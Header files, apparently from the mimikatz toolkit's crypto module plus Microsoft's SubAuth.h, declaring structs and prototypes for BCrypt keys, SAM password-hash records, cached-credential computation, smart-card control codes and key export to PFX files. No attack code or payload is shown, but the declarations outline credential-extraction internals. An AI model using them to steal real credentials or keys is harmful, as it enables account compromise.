62 | #if !defined(NCRYPT_USE_PER_BOOT_KEY_FLAG)
63 | #define NCRYPT_USE_PER_BOOT_KEY_FLAG 0x40000
64 | #endif
65 | #if !defined(NCRYPT_USE_VIRTUAL_ISOLATION_PROPERTY)
66 | #define NCRYPT_USE_VIRTUAL_ISOLATION_PROPERTY L"Virtual Iso"
67 | #endif
68 | #if !defined(NCRYPT_USE_PER_BOOT_KEY_PROPERTY)
69 | #define NCRYPT_USE_PER_BOOT_KEY_PROPERTY L"Per Boot Key"
70 | #endif
71 |
72 | #if !defined(BCRYPT_ECCFULLPRIVATE_BLOB)
73 | #define BCRYPT_ECCFULLPRIVATE_BLOB L"ECCFULLPRIVATEBLOB"
74 | #endif
75 |
76 | #if !defined(BCRYPT_ECDH_PRIVATE_GENERIC_MAGIC)
77 | #define BCRYPT_ECDH_PRIVATE_GENERIC_MAGIC 0x564B4345 // ECKV
78 | #endif
79 |
80 | #if !defined(BCRYPT_ECDSA_PRIVATE_GENERIC_MAGIC)
81 | #define BCRYPT_ECDSA_PRIVATE_GENERIC_MAGIC 0x56444345 // ECDV
82 | #endif
83 |
84 | #if !defined(BCRYPT_HMAC_SHA256_ALG_HANDLE)
85 | #define BCRYPT_HMAC_SHA256_ALG_HANDLE ((BCRYPT_ALG_HANDLE) 0x000000b1)
86 | #endif
87 |
88 | #ifndef CRYPT_ECC_PRIVATE_KEY_INFO_v1
89 | //+-------------------------------------------------------------------------
90 | // ECC Private Key Info
91 | //--------------------------------------------------------------------------
92 | typedef struct _CRYPT_ECC_PRIVATE_KEY_INFO{
93 | DWORD dwVersion; // ecPrivKeyVer1(1)
94 | CRYPT_DER_BLOB PrivateKey; // d
95 | LPSTR szCurveOid; // Optional
96 | CRYPT_BIT_BLOB PublicKey; // Optional (x, y)
97 | } CRYPT_ECC_PRIVATE_KEY_INFO, *PCRYPT_ECC_PRIVATE_KEY_INFO;
98 | #define CRYPT_ECC_PRIVATE_KEY_INFO_v1 1
99 | #endif
100 |
101 | typedef struct _PVK_FILE_HDR {
102 | DWORD dwMagic;
103 | DWORD dwVersion;
104 | DWORD dwKeySpec;
105 | DWORD dwEncryptType;
106 | DWORD cbEncryptData;
107 | DWORD cbPvk;
108 | } PVK_FILE_HDR, *PPVK_FILE_HDR;
109 |
110 | typedef struct _KIWI_HARD_KEY {
111 | ULONG cbSecret;
112 | BYTE data[ANYSIZE_ARRAY]; // etc...
113 | } KIWI_HARD_KEY, *PKIWI_HARD_KEY;
114 |
115 | typedef struct _KIWI_BCRYPT_KEY {
116 | ULONG size;
117 | ULONG tag; // 'MSSK'
118 | ULONG type;
119 | ULONG unk0;
120 | ULONG unk1;
121 | ULONG bits;
122 | KIWI_HARD_KEY hardkey;
123 | } KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
124 |
125 | BOOL kull_m_crypto_hash(ALG_ID algid, LPCVOID data, DWORD dataLen, LPVOID hash, DWORD hashWanted);
126 | BOOL kull_m_crypto_hkey(HCRYPTPROV hProv, ALG_ID calgid, LPCVOID key, DWORD keyLen, DWORD flags, HCRYPTKEY *hKey, HCRYPTPROV *hSessionProv);
127 | BOOL kull_m_crypto_hmac(DWORD calgid, LPCVOID key, DWORD keyLen, LPCVOID message, DWORD messageLen, LPVOID hash, DWORD hashWanted);
128 | BOOL kull_m_crypto_pkcs5_pbkdf2_hmac(DWORD calgid, LPCVOID password, DWORD passwordLen, LPCVOID salt, DWORD saltLen, DWORD iterations, BYTE *key, DWORD keyLen, BOOL isDpapiInternal);
129 | BOOL kull_m_crypto_desx_encrypt(HCRYPTPROV hProv, LPCVOID key, LPCVOID block, PVOID encrypted);
130 | BOOL kull_m_crypto_desx_decrypt(HCRYPTPROV hProv, LPCVOID key, LPCVOID block, PVOID decrypted);
131 | BOOL kull_m_crypto_aesCTSEncryptDecrypt(DWORD aesCalgId, PVOID data, DWORD szData, PVOID key, DWORD szKey, PVOID pbIV, BOOL encrypt);
132 | BOOL kull_m_crypto_DeriveKeyRaw(ALG_ID hashId, LPVOID hash, DWORD hashLen, LPVOID key, DWORD keyLen);
133 | BOOL kull_m_crypto_close_hprov_delete_container(HCRYPTPROV hProv);
134 | BOOL kull_m_crypto_hkey_session(ALG_ID calgid, LPCVOID key, DWORD keyLen, DWORD flags, HCRYPTKEY *hSessionKey, HCRYPTPROV *hSessionProv);
135 | DWORD kull_m_crypto_hash_len(ALG_ID hashId);
136 | DWORD kull_m_crypto_cipher_blocklen(ALG_ID hashId);
137 | DWORD kull_m_crypto_cipher_keylen(ALG_ID hashId);
138 | NTSTATUS kull_m_crypto_get_dcc(PBYTE dcc, PBYTE ntlm, PUNICODE_STRING Username, DWORD realIterations);
139 | BOOL kull_m_crypto_genericAES128Decrypt(LPCVOID pKey, LPCVOID pIV, LPCVOID pData, DWORD dwDataLen, LPVOID *pOut, DWORD *dwOutLen);
140 |
141 | BOOL kull_m_crypto_exportPfx(HCERTSTORE hStore, LPCWSTR filename);
142 | BOOL kull_m_crypto_DerAndKeyToPfx(LPCVOID der, DWORD derLen, LPCVOID key, DWORD keyLen, BOOL isPvk, LPCWSTR filename);
143 | BOOL kull_m_crypto_DerAndKeyInfoToPfx(LPCVOID der, DWORD derLen, PCRYPT_KEY_PROV_INFO pInfo, LPCWSTR filename);
144 | BOOL kull_m_crypto_DerAndKeyInfoToStore(LPCVOID der, DWORD derLen, PCRYPT_KEY_PROV_INFO pInfo, DWORD systemStore, LPCWSTR store, BOOL force);
145 |
146 | BOOL kull_m_crypto_CryptGetProvParam(HCRYPTPROV hProv, DWORD dwParam, BOOL withError, PBYTE *data, OPTIONAL DWORD *cbData, OPTIONAL DWORD *simpleDWORD);
147 | BOOL kull_m_crypto_NCryptGetProperty(NCRYPT_HANDLE monProv, LPCWSTR pszProperty, BOOL withError, PBYTE *data, OPTIONAL DWORD *cbData, OPTIONAL DWORD *simpleDWORD, OPTIONAL NCRYPT_HANDLE *simpleHandle);
148 | BOOL kull_m_crypto_NCryptFreeHandle(NCRYPT_PROV_HANDLE *hProv, NCRYPT_KEY_HANDLE *hKey);
149 | BOOL kull_m_crypto_NCryptImportKey(LPCVOID data, DWORD dwSize, LPCWSTR type, NCRYPT_PROV_HANDLE *hProv, NCRYPT_KEY_HANDLE *hKey);
150 |
151 | typedef struct _KULL_M_CRYPTO_DUAL_STRING_DWORD {
152 | PCWSTR name;
153 | DWORD id;
154 | } KULL_M_CRYPTO_DUAL_STRING_DWORD, *PKULL_M_CRYPTO_DUAL_STRING_DWORD;
155 |
156 | typedef struct _KULL_M_CRYPTO_DUAL_STRING_STRING {
157 | PCWSTR name;
158 | PCWSTR realname;
159 | } KULL_M_CRYPTO_DUAL_STRING_STRING, *PKULL_M_CRYPTO_DUAL_STRING_STRING;
160 |
161 | #define CERT_cert_file_element 32
162 | #define CERT_crl_file_element 33
163 | #define CERT_ctl_file_element 34
164 | #define CERT_keyid_file_element 35
165 |
166 | DWORD kull_m_crypto_system_store_to_dword(PCWSTR name);
167 | DWORD kull_m_crypto_provider_type_to_dword(PCWSTR name);
168 | PCWSTR kull_m_crypto_provider_type_to_name(const DWORD dwProvType);
169 | PCWCHAR kull_m_crypto_provider_to_realname(PCWSTR name);
170 | PCWCHAR kull_m_crypto_keytype_to_str(const DWORD keyType);
171 | PCWCHAR kull_m_crypto_algid_to_name(ALG_ID algid);
172 | ALG_ID kull_m_crypto_name_to_algid(PCWSTR name);
173 | PCWCHAR kull_m_crypto_cert_prop_id_to_name(const DWORD propId);
174 | void kull_m_crypto_kp_permissions_descr(const DWORD keyPermissions);
175 | PCWCHAR kull_m_crypto_kp_mode_to_str(const DWORD keyMode);
176 | void kull_m_crypto_pp_imptypes_descr(const DWORD implTypes);
177 | PCWCHAR kull_m_crypto_bcrypt_interface_to_str(const DWORD interf);
178 | PCWCHAR kull_m_crypto_bcrypt_cipher_alg_to_str(const DWORD alg);
179 | PCWCHAR kull_m_crypto_bcrypt_asym_alg_to_str(const DWORD alg);
180 | PCWCHAR kull_m_crypto_bcrypt_mode_to_str(const DWORD keyMode);
181 | void kull_m_crypto_ncrypt_impl_types_descr(const DWORD implTypes);
182 | void kull_m_crypto_ncrypt_allow_exports_descr(const DWORD allowExports);
183 |
184 | typedef struct _MIMI_PUBLICKEY {
185 | ALG_ID sessionType;
186 | DWORD cbPublicKey;
187 | BYTE *pbPublicKey;
188 | } MIMI_PUBLICKEY, *PMIMI_PUBLICKEY;
189 |
190 | typedef struct _KIWI_DH {
191 | HCRYPTPROV hProvParty;
192 | HCRYPTKEY hPrivateKey;
193 | MIMI_PUBLICKEY publicKey;
194 | HCRYPTKEY hSessionKey;
195 | } KIWI_DH, *PKIWI_DH;
196 |
197 | PKIWI_DH kull_m_crypto_dh_Delete(PKIWI_DH dh);
198 | PKIWI_DH kull_m_crypto_dh_Create(ALG_ID targetSessionKeyType);
199 | BOOL kull_m_crypto_dh_CreateSessionKey(PKIWI_DH dh, PMIMI_PUBLICKEY publicKey);
200 | BOOL kull_m_crypto_dh_simpleEncrypt(HCRYPTKEY key, LPVOID data, DWORD dataLen, LPVOID *out, DWORD *outLen);
201 | BOOL kull_m_crypto_dh_simpleDecrypt(HCRYPTKEY key, LPVOID data, DWORD dataLen, LPVOID *out, DWORD *outLen);
202 |
203 | BOOL kull_m_crypto_StringToBinaryA(LPCSTR pszString, DWORD cchString, DWORD dwFlags, PBYTE* ppbBinary, PDWORD pcbBinary);
204 | BOOL kull_m_crypto_StringToBinaryW(LPCWSTR pszString, DWORD cchString, DWORD dwFlags, PBYTE* ppbBinary, PDWORD pcbBinary);
205 |
206 | #define IOCTL_GET_FEATURE_REQUEST SCARD_CTL_CODE(3400)
207 | #define IOCTL_CCID_ESCAPE SCARD_CTL_CODE(3500)
208 |
209 | // ACS
210 | #define IOCTL_SMARTCARD_DIRECT SCARD_CTL_CODE(2050)
211 | #define IOCTL_SMARTCARD_SELECT_SLOT SCARD_CTL_CODE(2051)
212 | #define IOCTL_SMARTCARD_DRAW_LCDBMP SCARD_CTL_CODE(2052)
213 | #define IOCTL_SMARTCARD_DISPLAY_LCD SCARD_CTL_CODE(2053)
214 | #define IOCTL_SMARTCARD_CLR_LCD SCARD_CTL_CODE(2054)
215 | #define IOCTL_SMARTCARD_READ_KEYPAD SCARD_CTL_CODE(2055)
216 | #define IOCTL_SMARTCARD_READ_MAGSTRIP SCARD_CTL_CODE(2056)
217 | #define IOCTL_SMARTCARD_READ_RTC SCARD_CTL_CODE(2057)
218 | #define IOCTL_SMARTCARD_SET_RTC SCARD_CTL_CODE(2058)
219 | #define IOCTL_SMARTCARD_SET_OPTION SCARD_CTL_CODE(2059)
220 | #define IOCTL_SMARTCARD_SET_LED SCARD_CTL_CODE(2060)
221 | #define IOCTL_SMARTCARD_USE_ENCRYPTION SCARD_CTL_CODE(2061)
222 | #define IOCTL_SMARTCARD_LOAD_KEY SCARD_CTL_CODE(2062)
223 | #define IOCTL_SMARTCARD_COMPUTE_MAC SCARD_CTL_CODE(2063)
224 | #define IOCTL_SMARTCARD_DECRYPT_MAC SCARD_CTL_CODE(2064)
225 | #define IOCTL_SMARTCARD_READ_EEPROM SCARD_CTL_CODE(2065)
226 | #define IOCTL_SMARTCARD_WRITE_EEPROM SCARD_CTL_CODE(2066)
227 | #define IOCTL_SMARTCARD_GET_VERSION SCARD_CTL_CODE(2067)
228 | #define IOCTL_SMARTCARD_DUKPT_INIT_KEY SCARD_CTL_CODE(2069)
229 | #define IOCTL_SMARTCARD_ABORD_DUKPT_PIN SCARD_CTL_CODE(2070)
230 | #define IOCTL_SMARTCARD_SET_USB_VIDPID SCARD_CTL_CODE(2071)
231 | #define IOCTL_SMARTCARD_ACR128_ESCAPE_COMMAND SCARD_CTL_CODE(2079)
232 |
233 | #define IOCTL_SMARTCARD_GET_READER_INFO SCARD_CTL_CODE(2051)
234 | #define IOCTL_SMARTCARD_SET_CARD_TYPE SCARD_CTL_CODE(2060)
235 |
236 | // CYBERJACK
237 | #define CJPCSC_VEN_IOCTRL_ESCAPE SCARD_CTL_CODE(3103)
238 | #define CJPCSC_VEN_IOCTRL_VERIFY_PIN_DIRECT SCARD_CTL_CODE(3506)
239 | #define CJPCSC_VEN_IOCTRL_MODIFY_PIN_DIRECT SCARD_CTL_CODE(3507)
240 | #define CJPCSC_VEN_IOCTRL_MCT_READERDIRECT SCARD_CTL_CODE(3508)
241 | #define CJPCSC_VEN_IOCTRL_MCT_READERUNIVERSAL SCARD_CTL_CODE(3509)
242 | #define CJPCSC_VEN_IOCTRL_EXECUTE_PACE SCARD_CTL_CODE(3532)
243 | #define CJPCSC_VEN_IOCTRL_SET_NORM SCARD_CTL_CODE(3154)
244 |
245 | // OMNIKEY
246 | #define CM_IOCTL_GET_FW_VERSION SCARD_CTL_CODE(3001)
247 | #define CM_IOCTL_GET_LIB_VERSION SCARD_CTL_CODE(3041) // not in doc
248 | #define CM_IOCTL_SIGNAL SCARD_CTL_CODE(3058)
249 | #define CM_IOCTL_RFID_GENERIC SCARD_CTL_CODE(3105)
250 | #define CM_IOCTL_SET_OPERATION_MODE SCARD_CTL_CODE(3107)
251 | #define CM_IOCTL_GET_MAXIMUM_RFID_BAUDRATE SCARD_CTL_CODE(3208)
252 | #define CM_IOCTL_SET_RFID_CONTROL_FLAGS SCARD_CTL_CODE(3213)
253 | #define CM_IOCTL_GET_SET_RFID_BAUDRATE SCARD_CTL_CODE(3215)
254 |
255 | // GEMALTO
256 | #define IOCTL_VENDOR_IFD_EXCHANGE SCARD_CTL_CODE(2058)
257 | #define IOCTL_SMARTCARD_PC_SC_VERIFY_PIN SCARD_CTL_CODE(2060)
258 | #define IOCTL_SMARTCARD_PC_SC_MODIFY_PIN SCARD_CTL_CODE(2061)
259 |
260 | #define FEATURE_VERIFY_PIN_START 0x01
261 | #define FEATURE_VERIFY_PIN_FINISH 0x02
262 | #define FEATURE_MODIFY_PIN_START 0x03
263 | #define FEATURE_MODIFY_PIN_FINISH 0x04
264 | #define FEATURE_GET_KEY_PRESSED 0x05
265 | #define FEATURE_VERIFY_PIN_DIRECT 0x06
266 | #define FEATURE_MODIFY_PIN_DIRECT 0x07
267 | #define FEATURE_MCT_READER_DIRECT 0x08
268 | #define FEATURE_MCT_UNIVERSAL 0x09
269 | #define FEATURE_IFD_PIN_PROP 0x0a
270 | #define FEATURE_ABORT 0x0b
271 | #define FEATURE_SET_SPE_MESSAGE 0x0c
272 | #define FEATURE_VERIFY_PIN_DIRECT_APP_ID 0x0d
273 | #define FEATURE_MODIFY_PIN_DIRECT_APP_ID 0x0e
274 | #define FEATURE_WRITE_DISPLAY 0x0f
275 | #define FEATURE_GET_KEY 0x10
276 | #define FEATURE_IFD_DISPLAY_PROPERTIES 0x11
277 | #define FEATURE_GET_TLV_PROPERTIES 0x12
278 | #define FEATURE_CCID_ESC_COMMAND 0x13
279 | #define FEATURE_EXECUTE_PACE 0x20
280 |
281 | #pragma pack(push, 1)
282 | typedef struct _KIWI_TLV_FEATURE {
283 | BYTE Tag;
284 | BYTE Length; // 4
285 | DWORD ControlCode; // BE
286 | } KIWI_TLV_FEATURE, *PKIWI_TLV_FEATURE;
287 | #pragma pack(pop)
--------------------------------------------------------------------------------
/inc/SubAuth.h:
--------------------------------------------------------------------------------
1 | /*++ BUILD Version: 0005 Increment this if a change has global effects
2 |
3 | Copyright (c) Microsoft Corporation. All rights reserved.
4 |
5 | Module Name:
6 |
7 | subauth.h
8 |
9 | Abstract:
10 |
11 | This module defines types and macros for Subauthentication Packages.
12 |
13 | Revision History:
14 |
15 | --*/
16 |
17 | #ifndef _NTSUBAUTH_
18 | #define _NTSUBAUTH_
19 |
20 | #ifdef __cplusplus
21 | extern "C" {
22 | #endif
23 |
24 | #if (!defined(_NTDEF_)) && (!defined(_NTSECAPI_))
25 | typedef LONG NTSTATUS, *PNTSTATUS;
26 |
27 | typedef struct _UNICODE_STRING {
28 | USHORT Length;
29 | USHORT MaximumLength;
30 | PWSTR Buffer;
31 | } UNICODE_STRING, *PUNICODE_STRING;
32 |
33 | typedef struct _STRING {
34 | USHORT Length;
35 | USHORT MaximumLength;
36 | PCHAR Buffer;
37 | } STRING, *PSTRING;
38 | #endif
39 |
40 | #ifndef _NTDEF_
41 |
42 | typedef struct _OLD_LARGE_INTEGER {
43 | ULONG LowPart;
44 | LONG HighPart;
45 | } OLD_LARGE_INTEGER, *POLD_LARGE_INTEGER;
46 |
47 | #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
48 |
49 | #endif
50 |
51 | #ifndef _NTSAM_SAM_HANDLE_
52 | typedef PVOID SAM_HANDLE, *PSAM_HANDLE;
53 | #define _NTSAM_SAM_HANDLE_
54 | #endif
55 | #ifndef _NTSAM_USER_ACCOUNT_FLAGS_
56 |
57 | //
58 | // User account control flags...
59 | //
60 |
61 | #define USER_ACCOUNT_DISABLED (0x00000001)
62 | #define USER_HOME_DIRECTORY_REQUIRED (0x00000002)
63 | #define USER_PASSWORD_NOT_REQUIRED (0x00000004)
64 | #define USER_TEMP_DUPLICATE_ACCOUNT (0x00000008)
65 | #define USER_NORMAL_ACCOUNT (0x00000010)
66 | #define USER_MNS_LOGON_ACCOUNT (0x00000020)
67 | #define USER_INTERDOMAIN_TRUST_ACCOUNT (0x00000040)
68 | #define USER_WORKSTATION_TRUST_ACCOUNT (0x00000080)
69 | #define USER_SERVER_TRUST_ACCOUNT (0x00000100)
70 | #define USER_DONT_EXPIRE_PASSWORD (0x00000200)
71 | #define USER_ACCOUNT_AUTO_LOCKED (0x00000400)
72 | #define USER_ENCRYPTED_TEXT_PASSWORD_ALLOWED (0x00000800)
73 | #define USER_SMARTCARD_REQUIRED (0x00001000)
74 | #define USER_TRUSTED_FOR_DELEGATION (0x00002000)
75 | #define USER_NOT_DELEGATED (0x00004000)
76 | #define USER_USE_DES_KEY_ONLY (0x00008000)
77 | #define USER_DONT_REQUIRE_PREAUTH (0x00010000)
78 | #define USER_PASSWORD_EXPIRED (0x00020000)
79 | #define USER_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION (0x00040000)
80 | #define USER_NO_AUTH_DATA_REQUIRED (0x00080000)
81 | #define USER_PARTIAL_SECRETS_ACCOUNT (0x00100000)
82 | #define USER_USE_AES_KEYS (0x00200000)
83 | // for generating ntsubauth.h file
84 | //
85 |
86 | // begin_ntsubauth
87 | #define NEXT_FREE_ACCOUNT_CONTROL_BIT (USER_USE_AES_KEYS << 1)
88 |
89 | #define USER_MACHINE_ACCOUNT_MASK \
90 | ( USER_INTERDOMAIN_TRUST_ACCOUNT |\
91 | USER_WORKSTATION_TRUST_ACCOUNT |\
92 | USER_SERVER_TRUST_ACCOUNT)
93 |
94 | #define USER_ACCOUNT_TYPE_MASK \
95 | ( USER_TEMP_DUPLICATE_ACCOUNT |\
96 | USER_NORMAL_ACCOUNT |\
97 | USER_MACHINE_ACCOUNT_MASK )
98 |
99 | #define USER_COMPUTED_ACCOUNT_CONTROL_BITS \
100 | (USER_ACCOUNT_AUTO_LOCKED | \
101 | USER_PASSWORD_EXPIRED )
102 |
103 |
104 |
105 | //
106 | // Logon times may be expressed in day, hour, or minute granularity.
107 | //
108 | // Days per week = 7
109 | // Hours per week = 168
110 | // Minutes per week = 10080
111 | //
112 |
113 | #define SAM_DAYS_PER_WEEK (7)
114 | #define SAM_HOURS_PER_WEEK (24 * SAM_DAYS_PER_WEEK)
115 | #define SAM_MINUTES_PER_WEEK (60 * SAM_HOURS_PER_WEEK)
116 |
117 | typedef struct _LOGON_HOURS {
118 |
119 | USHORT UnitsPerWeek;
120 |
121 | //
122 | // UnitsPerWeek is the number of equal length time units the week is
123 | // divided into. This value is used to compute the length of the bit
124 | // string in logon_hours. Must be less than or equal to
125 | // SAM_UNITS_PER_WEEK (10080) for this release.
126 | //
127 | // LogonHours is a bit map of valid logon times. Each bit represents
128 | // a unique division in a week. The largest bit map supported is 1260
129 | // bytes (10080 bits), which represents minutes per week. In this case
130 | // the first bit (bit 0, byte 0) is Sunday, 00:00:00 - 00-00:59; bit 1,
131 | // byte 0 is Sunday, 00:01:00 - 00:01:59, etc. A NULL pointer means
132 | // DONT_CHANGE for SamSetInformationUser() calls.
133 | //
134 |
135 | PUCHAR LogonHours;
136 |
137 | } LOGON_HOURS, *PLOGON_HOURS;
138 |
139 | typedef struct _SR_SECURITY_DESCRIPTOR {
140 | ULONG Length;
141 | PUCHAR SecurityDescriptor;
142 | } SR_SECURITY_DESCRIPTOR, *PSR_SECURITY_DESCRIPTOR;
143 |
144 | #define _NTSAM_USER_ACCOUNT_FLAG_
145 | #endif
146 | #ifndef _NTSAM_USER_ALL_INFO_
147 | #include "pshpack4.h"
148 | typedef struct _USER_ALL_INFORMATION {
149 | LARGE_INTEGER LastLogon;
150 | LARGE_INTEGER LastLogoff;
151 | LARGE_INTEGER PasswordLastSet;
152 | LARGE_INTEGER AccountExpires;
153 | LARGE_INTEGER PasswordCanChange;
154 | LARGE_INTEGER PasswordMustChange;
155 | UNICODE_STRING UserName;
156 | UNICODE_STRING FullName;
157 | UNICODE_STRING HomeDirectory;
158 | UNICODE_STRING HomeDirectoryDrive;
159 | UNICODE_STRING ScriptPath;
160 | UNICODE_STRING ProfilePath;
161 | UNICODE_STRING AdminComment;
162 | UNICODE_STRING WorkStations;
163 | UNICODE_STRING UserComment;
164 | UNICODE_STRING Parameters;
165 | UNICODE_STRING LmPassword;
166 | UNICODE_STRING NtPassword;
167 | UNICODE_STRING PrivateData;
168 | SR_SECURITY_DESCRIPTOR SecurityDescriptor;
169 | ULONG UserId;
170 | ULONG PrimaryGroupId;
171 | ULONG UserAccountControl;
172 | ULONG WhichFields;
173 | LOGON_HOURS LogonHours;
174 | USHORT BadPasswordCount;
175 | USHORT LogonCount;
176 | USHORT CountryCode;
177 | USHORT CodePage;
178 | BOOLEAN LmPasswordPresent;
179 | BOOLEAN NtPasswordPresent;
180 | BOOLEAN PasswordExpired;
181 | BOOLEAN PrivateDataSensitive;
182 | } USER_ALL_INFORMATION, *PUSER_ALL_INFORMATION;
183 | #include "poppack.h"
184 | #define _NTSAM_USER_ALL_INFO_
185 | #endif
186 | #ifndef _NTSAM_SAM_USER_PARMS_
187 | #define USER_ALL_PARAMETERS 0x00200000
188 | #define _NTSAM_SAM_USER_PARMS_
189 | #endif
190 |
191 | #define CLEAR_BLOCK_LENGTH 8
192 |
193 | typedef struct _CLEAR_BLOCK {
194 | CHAR data[CLEAR_BLOCK_LENGTH];
195 | } CLEAR_BLOCK;
196 | typedef CLEAR_BLOCK * PCLEAR_BLOCK;
197 |
198 | #define CYPHER_BLOCK_LENGTH 8
199 |
200 | typedef struct _CYPHER_BLOCK {
201 | CHAR data[CYPHER_BLOCK_LENGTH];
202 | } CYPHER_BLOCK;
203 | typedef CYPHER_BLOCK * PCYPHER_BLOCK;
204 | typedef struct _LM_OWF_PASSWORD {
205 | CYPHER_BLOCK data[2];
206 | } LM_OWF_PASSWORD;
207 | typedef LM_OWF_PASSWORD * PLM_OWF_PASSWORD;
208 | typedef CLEAR_BLOCK LM_CHALLENGE;
209 | typedef LM_CHALLENGE * PLM_CHALLENGE;
210 | typedef LM_OWF_PASSWORD NT_OWF_PASSWORD;
211 | typedef NT_OWF_PASSWORD * PNT_OWF_PASSWORD;
212 | typedef LM_CHALLENGE NT_CHALLENGE;
213 | typedef NT_CHALLENGE * PNT_CHALLENGE;
214 | #define USER_SESSION_KEY_LENGTH (CYPHER_BLOCK_LENGTH * 2)
215 |
216 | typedef struct _USER_SESSION_KEY {
217 | CYPHER_BLOCK data[2];
218 | } USER_SESSION_KEY;
219 | typedef USER_SESSION_KEY * PUSER_SESSION_KEY;
220 |
221 | typedef enum _NETLOGON_LOGON_INFO_CLASS {
222 | NetlogonInteractiveInformation = 1,
223 | NetlogonNetworkInformation,
224 | NetlogonServiceInformation,
225 | NetlogonGenericInformation,
226 | NetlogonInteractiveTransitiveInformation,
227 | NetlogonNetworkTransitiveInformation,
228 | NetlogonServiceTransitiveInformation
229 | } NETLOGON_LOGON_INFO_CLASS;
230 |
231 | typedef struct _NETLOGON_LOGON_IDENTITY_INFO {
232 | UNICODE_STRING LogonDomainName;
233 | ULONG ParameterControl;
234 | OLD_LARGE_INTEGER LogonId;
235 | UNICODE_STRING UserName;
236 | UNICODE_STRING Workstation;
237 | } NETLOGON_LOGON_IDENTITY_INFO,
238 | *PNETLOGON_LOGON_IDENTITY_INFO;
239 |
240 | typedef struct _NETLOGON_INTERACTIVE_INFO {
241 | NETLOGON_LOGON_IDENTITY_INFO Identity;
242 | LM_OWF_PASSWORD LmOwfPassword;
243 | NT_OWF_PASSWORD NtOwfPassword;
244 | } NETLOGON_INTERACTIVE_INFO,
245 | *PNETLOGON_INTERACTIVE_INFO;
246 |
247 | typedef struct _NETLOGON_SERVICE_INFO {
248 | NETLOGON_LOGON_IDENTITY_INFO Identity;
249 | LM_OWF_PASSWORD LmOwfPassword;
250 | NT_OWF_PASSWORD NtOwfPassword;
251 | } NETLOGON_SERVICE_INFO, *PNETLOGON_SERVICE_INFO;
252 |
253 | typedef struct _NETLOGON_NETWORK_INFO {
254 | NETLOGON_LOGON_IDENTITY_INFO Identity;
255 | LM_CHALLENGE LmChallenge;
256 | STRING NtChallengeResponse;
257 | STRING LmChallengeResponse;
258 | } NETLOGON_NETWORK_INFO, *PNETLOGON_NETWORK_INFO;
259 |
260 | typedef struct _NETLOGON_GENERIC_INFO {
261 | NETLOGON_LOGON_IDENTITY_INFO Identity;
262 | UNICODE_STRING PackageName;
263 | ULONG DataLength;
264 | #ifdef MIDL_PASS
265 | [size_is(DataLength)]
266 | #endif
267 | PUCHAR LogonData;
268 | } NETLOGON_GENERIC_INFO, *PNETLOGON_GENERIC_INFO;
269 |
270 |
271 | // Values for Flags
272 | #define MSV1_0_PASSTHRU 0x01
273 | #define MSV1_0_GUEST_LOGON 0x02
274 |
275 | NTSTATUS NTAPI
276 | Msv1_0SubAuthenticationRoutine(
277 | IN NETLOGON_LOGON_INFO_CLASS LogonLevel,
278 | IN PVOID LogonInformation,
279 | IN ULONG Flags,
280 | IN PUSER_ALL_INFORMATION UserAll,
281 | OUT PULONG WhichFields,
282 | OUT PULONG UserFlags,
283 | OUT PBOOLEAN Authoritative,
284 | OUT PLARGE_INTEGER LogoffTime,
285 | OUT PLARGE_INTEGER KickoffTime
286 | );
287 |
288 | typedef struct _MSV1_0_VALIDATION_INFO {
289 | LARGE_INTEGER LogoffTime;
290 | LARGE_INTEGER KickoffTime;
291 | UNICODE_STRING LogonServer;
292 | UNICODE_STRING LogonDomainName;
293 | USER_SESSION_KEY SessionKey;
294 | BOOLEAN Authoritative;
295 | ULONG UserFlags;
296 | ULONG WhichFields;
297 | ULONG UserId;
298 | } MSV1_0_VALIDATION_INFO, *PMSV1_0_VALIDATION_INFO;
299 |
300 | // values for WhichFields
301 |
302 | #define MSV1_0_VALIDATION_LOGOFF_TIME 0x00000001
303 | #define MSV1_0_VALIDATION_KICKOFF_TIME 0x00000002
304 | #define MSV1_0_VALIDATION_LOGON_SERVER 0x00000004
305 | #define MSV1_0_VALIDATION_LOGON_DOMAIN 0x00000008
306 | #define MSV1_0_VALIDATION_SESSION_KEY 0x00000010
307 | #define MSV1_0_VALIDATION_USER_FLAGS 0x00000020
308 | #define MSV1_0_VALIDATION_USER_ID 0x00000040
309 |
310 | // legal values for ActionsPerformed
311 | #define MSV1_0_SUBAUTH_ACCOUNT_DISABLED 0x00000001
312 | #define MSV1_0_SUBAUTH_PASSWORD 0x00000002
313 | #define MSV1_0_SUBAUTH_WORKSTATIONS 0x00000004
314 | #define MSV1_0_SUBAUTH_LOGON_HOURS 0x00000008
315 | #define MSV1_0_SUBAUTH_ACCOUNT_EXPIRY 0x00000010
316 | #define MSV1_0_SUBAUTH_PASSWORD_EXPIRY 0x00000020
317 | #define MSV1_0_SUBAUTH_ACCOUNT_TYPE 0x00000040
318 | #define MSV1_0_SUBAUTH_LOCKOUT 0x00000080
319 |
320 | NTSTATUS NTAPI
321 | Msv1_0SubAuthenticationRoutineEx(
322 | IN NETLOGON_LOGON_INFO_CLASS LogonLevel,
323 | IN PVOID LogonInformation,
324 | IN ULONG Flags,
325 | IN PUSER_ALL_INFORMATION UserAll,
326 | IN SAM_HANDLE UserHandle,
327 | IN OUT PMSV1_0_VALIDATION_INFO ValidationInfo,
328 | OUT PULONG ActionsPerformed
329 | );
330 |
331 | NTSTATUS NTAPI
332 | Msv1_0SubAuthenticationRoutineGeneric(
333 | IN PVOID SubmitBuffer,
334 | IN ULONG SubmitBufferLength,
335 | OUT PULONG ReturnBufferLength,
336 | OUT PVOID *ReturnBuffer
337 | );
338 |
339 | NTSTATUS NTAPI
340 | Msv1_0SubAuthenticationFilter(
341 | IN NETLOGON_LOGON_INFO_CLASS LogonLevel,
342 | IN PVOID LogonInformation,
343 | IN ULONG Flags,
344 | IN PUSER_ALL_INFORMATION UserAll,
345 | OUT PULONG WhichFields,
346 | OUT PULONG UserFlags,
347 | OUT PBOOLEAN Authoritative,
348 | OUT PLARGE_INTEGER LogoffTime,
349 | OUT PLARGE_INTEGER KickoffTime
350 | );
351 |
352 | #define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
353 | #define STATUS_INVALID_INFO_CLASS ((NTSTATUS)0xC0000003L)
354 | #define STATUS_NO_SUCH_USER ((NTSTATUS)0xC0000064L)
355 | #define STATUS_WRONG_PASSWORD ((NTSTATUS)0xC000006AL)
356 | #define STATUS_PASSWORD_RESTRICTION ((NTSTATUS)0xC000006CL)
357 | #define STATUS_LOGON_FAILURE ((NTSTATUS)0xC000006DL)
